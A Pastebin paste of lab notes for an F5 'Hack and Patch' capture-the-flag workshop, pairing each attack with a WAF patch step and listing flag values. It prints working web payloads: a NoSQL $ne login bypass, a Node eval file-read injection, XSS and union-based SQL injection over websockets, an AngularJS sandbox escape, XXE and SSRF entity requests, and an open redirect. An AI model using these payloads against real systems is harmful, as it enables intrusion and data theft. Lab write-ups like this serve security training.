Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hack and Patch
- Warning UP :
- 1. Hack : F5CTF{9120de7f620ac2bbfff8273918732a2}
- 2. Patch : F5CTF{8547f194fb98448a89e058e2a1f9d5a1}
- Node.js & MongoDB :
- 1. Hack MongoDB injection :
- a. Burp with flag user and flag password
- b. It is a nodeJS framework, so JSON format
- i. {"username" : "flag" , "password" : "flag"}
- c. Bypass authent
- i. JSON form : {"username" : "flag" , "password" : {“$ne”: "flag"}}
- ii. HTTP Regular form : username=flag&password[$ne]=flag
- 2. Patch MongoDB injection :
- a. On ASM, enable all signatures.
- b. Check SQLINJ - NoSQL [$ne]
- 3. Hack Eval is Evil
- a. Burp and send a calcul for tip$
- i. POST /api/node/calc
- ii. {"math":"(120 * 0.15 + 120) / 1"}
- iii. Console : eval((120 * 0.15 +120) /1) same result
- iv. Calculated on server side, so we can use it
- b. require(‘fs’).readFileSync("/eval/flag")) //
- i. 2 )) because we need to close the eval, then comments
- 4. Patch Eval is Evil
- a. JavaScript Code Injection - require(); (Parameter)
- Websockets :
- 1. Hack Authentication bypass
- a. Wss://udf_fqdn
- i. Wrong URL go to /admin
- b. Wss://udf_fqdn/admin
- i. Logout if needed on application side to delete cookie
- 2. Patch Authentication bypass
- a. Create a login page on ASM
- i. /login
- ii. Username / password
- iii. Expected response 302
- iv. String NOT : /login
- b. Login enforcement on /admin
- 3. Hack XSS over Websocket
- a. Login as admin on browser
- b. Make an order to test
- c. <script>alert(Pwned by Dancing Banana)</script>
- d. Refresh page if needed, re-test
- e. Inspect element – you can see the script. But not rendered by the browser
- f. <img src=/ onerror=alert(0xf5)>
- 4. Patch XSS over Websocket
- a. On error
- 5. Hack SQLi over websocket
- a. Driver, 5th Ave W' order by 1 -- '
- b. Should still work
- c. 5th Ave W' order by 6 -- ' still OK, so minimum 6 column
- d. 5th Ave W' order by 7 -- ' nok, so we have 6 columns
- e. ‘ union select 1,2,3,4,5,6 from flag -- ‘
- f. ‘ union select 1,2,3,4,flag,6 from flag -- ‘
- 6. Patch SQLi over websocket
- a. Don’t copy past, write the attack line (issue with ‘ and -- )
- Plateform based XSS :
- 1. Hack JS Injection
- a. Change filter value with something and check source code page
- b. Close the variable and inject the code
- i. Filter= matt”; alert(0x123) //
- ii. Filter= matt”; alert(0xf5) //
- 2. Patch JS Injection
- 3. Hack Anguler.js injection
- a. Go to fake page /matt
- b. /error?status=404&path=<123> will be escaped.
- c. /error?status=404&path={{3-1}} we should see 2 in the page
- d. /error?status=404&path={{1+1}} issue, does not work. Why ?
- i. http sees + but we need to encode it %2b
- 4. Hack Angular.js Sandbox bypass
- a. Google sandbox escape angularjs
- i. https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs
- b. Check Angular version on server side on page attacked source code v1.4.8
- c. {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(0xf5)//');}}
- 5. Patch Angular.js Sandbox bypass
- XXE & SSRF:
- 1. [Hack] XXE injection
- a. Contact form is XML – use Burp
- Original request
- <?xml version="1.0" encoding="UTF-8"?>
- <contact>
- <name>matt</name>
- <email>dier@gmail.com</email>
- <phone>0125632574</phone>
- <message>fsfgsdfgsdfgsdfgzerezrezrsdfsdfsdfsd</message>
- </contact>
- https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
- Attack request
- <?xml version="1.0" encoding="UTF-8"?>
- <!DOCTYPE foo [
- <!ELEMENT foo ANY >
- <!ENTITY xxe SYSTEM "file:///xxe/flag" >]>
- <contact>
- <name>&xxe;</name>
- <email>dier@gmail.com</email>
- <phone>0125632574</phone>
- <message>fsfgsdfgsdfgsdfgzerezrezrsdfsdfsdfsd</message>
- </contact>
- Response with Flag :
- 2. [Patch] XXE injection
- a. No idea how to retrieve the flag. No AJAX blocking page
- 3. [Hack] SSRF (GET)
- <?xml version="1.0" encoding="UTF-8"?>
- <!DOCTYPE foo [
- <!ELEMENT foo ANY >
- <!ENTITY xxe SYSTEM "http://ssrfserver/flag" >]>
- <contact>
- <name>&xxe;</name>
- <email>dier@gmail.com</email>
- <phone>0125632574</phone>
- <message>fsfgsdfgsdfgsdfgzerezrezrsdfsdfsdfsd</message>
- </contact>
- a. Tag :
- 4. [Patch] SSRF
- a. No AJAX popup but blocked
- HTML5 Elements:
- 1. [Hack] Media Event Injection
- a. Go to Services and check the URL. We can change the width (check the source code).
- b. https://www.w3schools.com/tags/ref_eventattributes.asp
- c. Element oncanplay interesting to exec something (if user can play )
- d. Add the element
- https://4997985e-a27c-4a62-a057-f51df08baea9.access.udf.f5.com/services?width=100%25 oncanplay=alert(‘F5’)
- 2. [Patch] Media Event Injection
- a. Check Server Techno and signature
- b. Blocking page but Not able to see the flag. Issue with the Tomer’s JS.
- Open Redirect
- 1. [Hack] Server Side Redirect
- a. Click on Admin and change the URL with the redirect
- https://4997985e-a27c-4a62-a057-f51df08baea9.access.udf.f5.com/login?path= https://f5.com/labs
- b. Login as admin
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement